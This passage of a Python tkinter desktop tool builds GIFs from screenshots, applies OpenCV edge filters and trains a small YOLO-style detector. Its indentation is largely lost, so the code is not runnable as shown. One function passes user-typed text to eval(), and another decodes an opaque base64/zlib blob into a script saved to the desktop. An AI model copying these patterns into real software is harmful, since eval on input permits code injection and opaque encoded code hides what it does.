fpic003ent.insert(0,'_temp')
Label(fpic0032, text='left').pack(side=tkinter.LEFT)
fpic003ent1 = Entry(fpic0032,width=4)
fpic003ent1.pack(side=tkinter.LEFT)
Label(fpic0032, text='top').pack(side=tkinter.LEFT)
fpic003ent2 = Entry(fpic0032,width=4)
fpic003ent2.pack(side=tkinter.LEFT)
Label(fpic0032, text='w').pack(side=tkinter.LEFT)
fpic003ent3 = Entry(fpic0032,width=4)
fpic003ent3.pack(side=tkinter.LEFT)
Label(fpic0032, text='h').pack(side=tkinter.LEFT)
fpic003ent4 = Entry(fpic0032,width=4)
fpic003ent4.pack(side=tkinter.LEFT)
fpic003btn1 = Button(fpic0032, text='录制图片[已关闭]',command=_pyscreenshot_video,width=16)
fpic003btn1.pack(side=tkinter.RIGHT)
fpic003btn2 = Button(fpic0032, text='定位',command=_pyscreenshot_video_local,width=5)
fpic003btn2.pack(side=tkinter.RIGHT)
fpic0040 = Frame(fpic1)
fpic0040.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0042 = Frame(fpic0040)
fpic0042.pack(side=tkinter.TOP,fill=tkinter.X)
def _pypng2gif(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pyfinddesktopfile
from . import pypng2gif
except:
import pyfinddesktopfile
import pypng2gif
try:
finddesktop = pyfinddesktopfile.finddesktop
create_gif = pypng2gif.create_gif
filedir = os.path.join(finddesktop(), fpic003ent.get().strip())
filepathname = os.path.join(finddesktop(), fpic004ent1.get().strip())
step = int(fpic004ent2.get().strip())
try:
scale = float(fpic004ent3.get().strip())
except:
scale = None
try:
size_w = int(fpic004ent4.get().strip())
size_h = int(fpic004ent5.get().strip())
size = size_w, size_h
except:
size = None
print('step: ',step)
print('size: ',size)
print('scale:',scale)
realwh = create_gif(filepathname,filedir,size=size,scale=1/scale if scale else None,step=step)
print('write in:{}'.format(filepathname))
print('gif-> wh:{}'.format(realwh))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pypng2gif_code(*a):
try:
from . import pypng2gif
except:
import pypng2gif
fpictxt.delete(0.,tkinter.END)
with open(pypng2gif.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pichelp2 = ''' 以下部分需要使用到第三方库 Pillow (py3)
通过桌面录制的 png 文件生成 gif 文件
鼓励前后部分多录制,因为下面合并 png 的步骤前
可以直接删除部分 png 图片文件来调节 gif 文件前后溢出位。
step : 间隔几张图片
scale : 等比缩放(建议使用)
size_w : 自定义尺寸(不建议使用)
size_h : 自定义尺寸(不建议使用)
(size,scale 最多只有一个有效,不编辑则使用默认)
'''
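    # Illustrative sketch of the png -> gif step described above, assuming Pillow is installed.
    # The real implementation is pypng2gif.create_gif; this helper name is hypothetical.
    def _sketch_pngs_to_gif(png_dir, out_path, step=2, scale=None, duration=100):
        import os
        from PIL import Image
        files = sorted(f for f in os.listdir(png_dir) if f.lower().endswith('.png'))[::max(step, 1)]
        frames = [Image.open(os.path.join(png_dir, f)).convert('P') for f in files]
        if scale:
            frames = [im.resize((int(im.width * scale), int(im.height * scale))) for im in frames]
        if frames:
            frames[0].save(out_path, save_all=True, append_images=frames[1:],
                           duration=duration, loop=0)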
Label(fpic0042, text=pichelp2).pack(side=tkinter.TOP)
Button(fpic0042, text='[算法]',command=_pypng2gif_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0042, text='生成文件名:').pack(side=tkinter.LEFT)
fpic004ent1 = Entry(fpic0042,width=8)
fpic004ent1.pack(side=tkinter.LEFT)
fpic004ent1.insert(0,'_temp.gif')
Label(fpic0042, text='step').pack(side=tkinter.LEFT)
fpic004ent2 = Entry(fpic0042,width=4)
fpic004ent2.pack(side=tkinter.LEFT)
fpic004ent2.insert(0,'2')
Label(fpic0042, text='scale').pack(side=tkinter.LEFT)
fpic004ent3 = Entry(fpic0042,width=4)
fpic004ent3.pack(side=tkinter.LEFT)
Label(fpic0042, text='size_w').pack(side=tkinter.LEFT)
fpic004ent4 = Entry(fpic0042,width=4)
fpic004ent4.pack(side=tkinter.LEFT)
Label(fpic0042, text='size_h').pack(side=tkinter.LEFT)
fpic004ent5 = Entry(fpic0042,width=4)
fpic004ent5.pack(side=tkinter.LEFT)
Button(fpic0042, text='生成 gif 到桌面',command=_pypng2gif,width=16).pack(side=tkinter.RIGHT)
# opencv
fpic0050 = Frame(fpic1)
fpic0050.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0052 = Frame(fpic0050)
fpic0052.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_canny(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
except:
import pycv2
import pyfinddesktopfile
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
if not gifs: return
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
left = int(fpic005ent1.get().strip())
right = int(fpic005ent2.get().strip())
v = pycv2.canny(v, left, right)
print('shape[h,w] -> {}'.format(v.shape))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
pichelp1 = '''以下部分需要使用到第三方库 opencv [pip install opencv-python (py3)]'''
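    # Illustrative sketch of the Canny edge detection the button below wraps, assuming
    # opencv-python is installed. The real code lives in pycv2; names here are hypothetical.
    def _sketch_canny(image_path, low=70, high=140):
        import cv2
        gray = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)
        return cv2.Canny(gray, low, high)  # low/high are the hysteresis thresholds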
Label(fpic0052, text=pichelp1).pack(side=tkinter.TOP,padx=10)
Button(fpic0052, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0052, text=' Canny').pack(side=tkinter.LEFT)
Button(fpic0052, text='Canny',command=_opencv_canny,width=16).pack(side=tkinter.RIGHT)
Label(fpic0052, text=' 后两项取值范围[0-255],通常默认即可: left').pack(side=tkinter.LEFT)
fpic005ent1 = Entry(fpic0052,width=4)
fpic005ent1.pack(side=tkinter.LEFT)
fpic005ent1.insert(0,'70')
Label(fpic0052, text='right').pack(side=tkinter.LEFT)
fpic005ent2 = Entry(fpic0052,width=4)
fpic005ent2.pack(side=tkinter.LEFT)
fpic005ent2.insert(0,'140')
fpic0060 = Frame(fpic1)
fpic0060.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0062 = Frame(fpic0060)
fpic0062.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_laplacian(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
except:
import pycv2
import pyfinddesktopfile
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
if not gifs: return
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
v = pycv2.laplacian(v)
print('shape[h,w] -> {}'.format(v.shape))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0062, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0062, text=' Laplacian').pack(side=tkinter.LEFT)
Button(fpic0062, text='Laplacian',command=_opencv_laplacian,width=16).pack(side=tkinter.RIGHT)
fpic0070 = Frame(fpic1)
fpic0070.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0072 = Frame(fpic0070)
fpic0072.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_sobel(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
except:
import pycv2
import pyfinddesktopfile
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
if not gifs: return
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
v = pycv2.sobel(v)
print('shape[h,w] -> {}'.format(v.shape))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0072, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0072, text=' Sobel').pack(side=tkinter.LEFT)
Button(fpic0072, text='Sobel',command=_opencv_sobel,width=16).pack(side=tkinter.RIGHT)
fpic0080 = Frame(fpic1)
fpic0080.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0082 = Frame(fpic0080)
fpic0082.pack(side=tkinter.TOP,fill=tkinter.X)
def _opencv_matchtemplate(*a):
data = fpictxt.get(0.,tkinter.END).strip('\n')
fpictxt.delete(0.,tkinter.END)
try:
from . import pycv2
from . import pyfinddesktopfile
from . import pyscreenshot
except:
import pycv2
import pyfinddesktopfile
import pyscreenshot
try:
finddesktop = pyfinddesktopfile.finddesktop
findfile_desktop = pyfinddesktopfile.findfile_desktop
SimpleDialog = pyfinddesktopfile.SimpleDialog
gifs = findfile_desktop()
gifs = [i for i in gifs if any([i.lower().endswith(j) for j in pycv2.canread])]
d = finddesktop()
s = SimpleDialog(fr,buttons=gifs,default=0,cancel=-1,).go()
if s != -1:
v = os.path.join(d, gifs[s])
t = fpic008ent1.get().strip()
f = tempfile.mkdtemp()
if t and os.path.isfile(os.path.join(d, t)):
t = os.path.join(d, t)
else:
t = os.path.join(f, '_desktop_png.png')
with open(t, 'wb') as f:
f.write(pyscreenshot.screenshot())
v = pycv2.findmatchtemplate(v, t)
print('top,left,w,h -> {}'.format(v))
except:
fpictxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pycv2_code(*a):
try:
from . import pycv2
except:
import pycv2
fpictxt.delete(0.,tkinter.END)
with open(pycv2.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fpic0082, text='[算法]',command=_pycv2_code,width=5).pack(side=tkinter.LEFT)
Label(fpic0082, text=' MatchTemplate').pack(side=tkinter.LEFT)
Button(fpic0082, text='MatchTemplate',command=_opencv_matchtemplate,width=16).pack(side=tkinter.RIGHT)
Label(fpic0082, text=' 背景图片,不填则默认桌面').pack(side=tkinter.LEFT)
fpic008ent1 = Entry(fpic0082,width=10)
fpic008ent1.pack(side=tkinter.LEFT)
fpic0090 = Frame(fpic1)
fpic0090.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0092 = Frame(fpic0090)
fpic0093 = Frame(fpic0090)
fpic0094 = Frame(fpic0090)
fpic0095 = Frame(fpic0090)
fpic0096 = Frame(fpic0090)
fpic0097 = Frame(fpic0090)
pichelp1 = '''
使用 pytorch 的模型快速训练简单的目标点选
以下部分需要使用到两个第三方库 opencv,以及 pytorch 。
之所以目前仅使用 voc 数据集是因为 labelimg 默认生成这种格式
并且 voc 格式在多标注方面用起来会很方便,这种格式的数据也会很清晰
* 注意,voc数据的图片文件路径请尽量和 voc标注数据的xml文件路径保持一致
因为代码在xml文件的path找不到图片就会在xml相同地址下找同名图片文件。
这样会很方便你剪贴训练数据集在不同地址进行训练。
* 注意,该工具内直接使用的训练模型是固定的,如果想要进行更高的自定义
请直接点击 “算法” 按钮,获取训练+测试脚本。
* 默认每个 epoch 保存一次模型文件,默认支持中断继续训练。
'''.strip('\n')
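    # Illustrative sketch of reading one Pascal VOC annotation file, the format the training
    # step above consumes. The real parser is pymini_yolo.read_voc_xml; this stdlib-only
    # helper (_sketch_read_voc_xml) is an assumption.
    def _sketch_read_voc_xml(xml_file):
        import xml.etree.ElementTree as ET
        node = ET.parse(xml_file).getroot()
        boxes = []
        for obj in node.iter('object'):
            bnd = obj.find('bndbox')
            boxes.append({'cate': obj.findtext('name'),
                          'xmin': int(float(bnd.findtext('xmin'))),
                          'ymin': int(float(bnd.findtext('ymin'))),
                          'xmax': int(float(bnd.findtext('xmax'))),
                          'ymax': int(float(bnd.findtext('ymax')))})
        return node.findtext('path'), boxes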
Label(fpic0092, text=pichelp1).pack(side=tkinter.TOP,padx=10)
fpic0092.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0093.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0094.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0095.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0096.pack(side=tkinter.TOP,fill=tkinter.X)
fpic0097.pack(side=tkinter.TOP,fill=tkinter.X)
train_data, imginfos, class_types, anchors = None, None, None, None
def _load_voc_data(*a):
def load_voc_data(xmlpath, anchors):
files = [os.path.join(xmlpath, path) for path in os.listdir(xmlpath) if path.endswith('.xml')]
imginfos = []
print('use anchors:', anchors)
print('load xml file number:{}, start.'.format(len(files)))
for idx, file in enumerate(files, 1):
if idx % 1000 == 0: print('loading {}/{}'.format(idx, len(files)))
imginfos.extend(pymini_yolo.read_voc_xml(file, islist=True))
if idx % 1000 != 0: print('loading {}/{}'.format(idx, len(files)))
            # Note: the data is loaded here as one small batch, so class_types is generated automatically.
            # If you train a large dataset in multiple batches, take care how class_types is generated.
class_types = [imginfo.get('cate') for imginfo in imginfos]
class_types = {typ:idx for idx,typ in enumerate(sorted(list(set(class_types))))}
print('class_types:', class_types)
train_data = []
print('make x_true,y_true. start.')
for idx, imginfo in enumerate(imginfos, 1):
if idx % 1000 == 0: print('makeing x_true,y_true. {}/{}'.format(idx, len(imginfos)))
x_true = pymini_yolo.torch.FloatTensor(imginfo['numpy'])
y_true = pymini_yolo.make_y_true(imginfo, 13, anchors, class_types)
train_data.append([x_true, y_true])
if idx % 1000 != 0: print('makeing x_true,y_true. {}/{}'.format(idx, len(imginfos)))
print('make x_true,y_true. ok.')
return train_data, imginfos, class_types
try:
xmlpath = fpic009ent1.get().strip()
if not os.path.isdir(xmlpath):
print('无效的 voc 文件地址。')
return
print('importing pytorch, opencv.')
try:
from . import pymini_yolo
except:
import pymini_yolo
print('import ok.')
nonlocal train_data, imginfos, class_types, anchors
anchors = [[60, 60]]
train_data, imginfos, class_types = load_voc_data(xmlpath, anchors)
except:
print(traceback.format_exc())
fpictxt.see(tkinter.END)
def _pymini_yolo_code(*a):
fpictxt.delete(0.,tkinter.END)
path = os.path.join(os.path.split(__file__)[0], 'pymini_yolo.py')
with open(path, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _set_train_file_dir(*a):
import tkinter.filedialog
dirpath = tkinter.filedialog.askdirectory()
print(dirpath)
fpic009ent1.delete(0,tkinter.END)
fpic009ent1.insert(tkinter.END, dirpath)
if not fpic0095ent1.get().strip():
fpic0095ent1.insert(tkinter.END, dirpath)
def _save_train_model_dir(*a):
import tkinter.filedialog
dirpath = tkinter.filedialog.askdirectory()
print(dirpath)
fpic0094ent1.delete(0,tkinter.END)
fpic0094ent1.insert(tkinter.END, dirpath)
def _save_test_model_dir(*a):
import tkinter.filedialog
dirpath = tkinter.filedialog.askdirectory()
print(dirpath)
fpic0095ent1.delete(0,tkinter.END)
fpic0095ent1.insert(tkinter.END, dirpath)
stop = True
def _pystoptrain_mini_yolo(*a):
nonlocal stop
print(stop)
stop = True
def _pytrain_mini_yolo(*a):
nonlocal train_data, class_types
if train_data is None:
print('没有加载训练数据。')
return
print('importing pytorch, opencv.')
try:
from . import pymini_yolo
except:
import pymini_yolo
print('import ok.')
nonlocal stop
if stop == True:
stop = False
else:
print('正在训练')
return
def train(train_data, anchors, class_types):
nonlocal stop
train_loader = pymini_yolo.Data.DataLoader(
dataset = train_data,
batch_size = BATCH_SIZE,
shuffle = True,
)
modelfilepath = os.path.join(fpic0094ent1.get().strip(), 'net.pkl')
try:
state = pymini_yolo.torch.load(modelfilepath)
net = pymini_yolo.Mini(anchors, class_types)
net.load_state_dict(state['net'])
net.to(pymini_yolo.DEVICE)
optimizer = state['optimizer']
epoch = state['epoch']
print('load train.')
except:
excp = traceback.format_exc()
if 'FileNotFoundError' not in excp:
print(excp)
net = pymini_yolo.Mini(anchors, class_types)
net.to(pymini_yolo.DEVICE)
optimizer = pymini_yolo.torch.optim.Adam(net.parameters(), lr=LR)
epoch = 0
print('new train.')
yloss = pymini_yolo.yoloLoss(13, anchors=anchors, class_types=class_types, )
net.train()
for epoch in range(epoch, epoch+EPOCH):
print('epoch', epoch)
for step, (x_true_, y_true_) in enumerate(train_loader):
print('[{:<3}]'.format(step), end='')
x_true = pymini_yolo.Variable(x_true_).to(pymini_yolo.DEVICE)
y_true = pymini_yolo.Variable(y_true_).to(pymini_yolo.DEVICE)
output = net(x_true)
loss = yloss(output, y_true, print)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if stop: break
fpictxt.see(tkinter.END)
if stop: break
state = {'net':net.state_dict(), 'optimizer':optimizer, 'epoch':epoch+1,
'anchors':anchors, 'class_types':class_types}
pymini_yolo.torch.save(state, modelfilepath)
print('save.')
print('end.')
try:
EPOCH = int(fpic0092ent1.get().strip())
BATCH_SIZE = int(fpic0092ent2.get().strip())
LR = float(fpic0092ent3.get().strip())
anchors = eval(fpic0092ent4.get().strip())
print('EPOCH:{}, BATCH_SIZE:{}, LR:{}, anchors:{}.'.format(EPOCH,BATCH_SIZE,LR,anchors))
threading.Thread(target=train, args=(train_data, anchors, class_types)).start()
except:
print(traceback.format_exc())
def _test_mini_yolo_data(*a):
filepath = fpic0095ent1.get().strip()
if not os.path.isdir(filepath):
print('无效的测试数据地址。')
return
if re.findall('[\u4e00-\u9fa5]', filepath):
print('无效的测试数据地址,opencv 加载图片地址不能含有中文。')
return
try:
try:
from . import pymini_yolo
except:
import pymini_yolo
modelfilepath = os.path.join(fpic0094ent1.get().strip(), 'net.pkl')
if not os.path.isfile(modelfilepath):
print('模型文件不存在 {}'.format(modelfilepath))
return
state = pymini_yolo.load_net(modelfilepath)
idx = 0
for file in os.listdir(filepath):
if file.lower().endswith('jpg') or file.lower().endswith('png') or file.lower().endswith('jpeg'):
_file = os.path.join(filepath, file)
pymini_yolo.get_all_draw_rects(_file, state)
idx += 1
if idx == 5:
return
except:
print(traceback.format_exc())
def _create_use_mini_yolo_code(*a):
zstring = (
'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'
)
# len(zstring): 3684
import base64, zlib
zstring = base64.b64decode(zstring)
zstring = zlib.decompress(zstring,-15)
string = zstring.decode("utf-8")
testpath = fpic0095ent1.get().strip()
if not testpath:
print('没有指定测试文件路径。')
return
testpath = repr(testpath)
code = string+'''
if __name__ == '__main__':
state = load_net('net.pkl')
for i in os.listdir({}):
if i.endswith('jpg'):
print(i)
get_all_draw_rects(os.path.join({}, i), state)
'''.format(testpath, testpath)
name = askstring('脚本名','请输入脚本文件名,尽量小写无空格。\n(存放到桌面)')
if not name: return
if not name.endswith('.py'): name += '.py'
desktop_script = os.path.join(os.path.expanduser("~"),'Desktop\\{}'.format(name))
if not os.path.isfile(desktop_script):
with open(desktop_script, 'w', encoding='utf-8') as f:
f.write(code)
else:
tkinter.messagebox.showwarning('脚本已存在','脚本已存在')
Button(fpic0093, text='加载数据',command=_load_voc_data,width=16).pack(side=tkinter.RIGHT)
Button(fpic0094, text='开始训练',command=_pytrain_mini_yolo,width=16).pack(side=tkinter.RIGHT)
Button(fpic0095, text='停止训练',command=_pystoptrain_mini_yolo,width=16).pack(side=tkinter.RIGHT)
Button(fpic0096, text='测试数据',command=_test_mini_yolo_data,width=16).pack(side=tkinter.RIGHT)
Button(fpic0097, text='生成使用代码',command=_create_use_mini_yolo_code,width=16).pack(side=tkinter.RIGHT)
Button(fpic0092, text='[算法]',command=_pymini_yolo_code,width=5).pack(side=tkinter.LEFT)
# Label(fpic0093, text='voc数据集地址').pack(side=tkinter.LEFT)
Button(fpic0093, text='[打开文件] voc数据集地址: ',command=_set_train_file_dir).pack(side=tkinter.LEFT)
fpic009ent1 = Entry(fpic0093,width=40)
fpic009ent1.pack(side=tkinter.RIGHT)
desktoppath = os.path.join(os.path.expanduser("~"),'Desktop')
Button(fpic0094, text='[打开文件] 模型存放地址: ',command=_save_train_model_dir).pack(side=tkinter.LEFT)
fpic0094ent1 = Entry(fpic0094,width=40)
fpic0094ent1.insert(tkinter.END, desktoppath)
fpic0094ent1.pack(side=tkinter.RIGHT)
Button(fpic0095, text='[打开文件] 测试数据(默认测5张): ',command=_save_test_model_dir).pack(side=tkinter.LEFT)
fpic0095ent1 = Entry(fpic0095,width=40)
fpic0095ent1.pack(side=tkinter.RIGHT)
Label(fpic0092, text='EPOCH').pack(side=tkinter.LEFT)
fpic0092ent1 = Entry(fpic0092,width=5)
fpic0092ent1.pack(side=tkinter.LEFT)
fpic0092ent1.insert(tkinter.END, '1000')
Label(fpic0092, text='BATCH_SIZE').pack(side=tkinter.LEFT)
fpic0092ent2 = Entry(fpic0092,width=4)
fpic0092ent2.pack(side=tkinter.LEFT)
fpic0092ent2.insert(tkinter.END, '4')
Label(fpic0092, text='LR').pack(side=tkinter.LEFT)
fpic0092ent3 = Entry(fpic0092,width=7)
fpic0092ent3.pack(side=tkinter.LEFT)
fpic0092ent3.insert(tkinter.END, '0.001')
Label(fpic0092, text='anchors').pack(side=tkinter.LEFT)
fpic0092ent4 = Entry(fpic0092,width=20)
fpic0092ent4.pack(side=tkinter.LEFT)
fpic0092ent4.insert(tkinter.END, '[[60, 60]]')
# Label(fpic0093, text=' 背景图片,不填则默认桌面').pack(side=tkinter.LEFT)
    return fr  # Keep this return at the very end of this function during development.
if __name__ == '__main__':
# test frame
fr = encode_window()
fr.title('命令行输入 vv e 则可快速打开便捷加密窗口')
sys.stdout = __org_stdout__
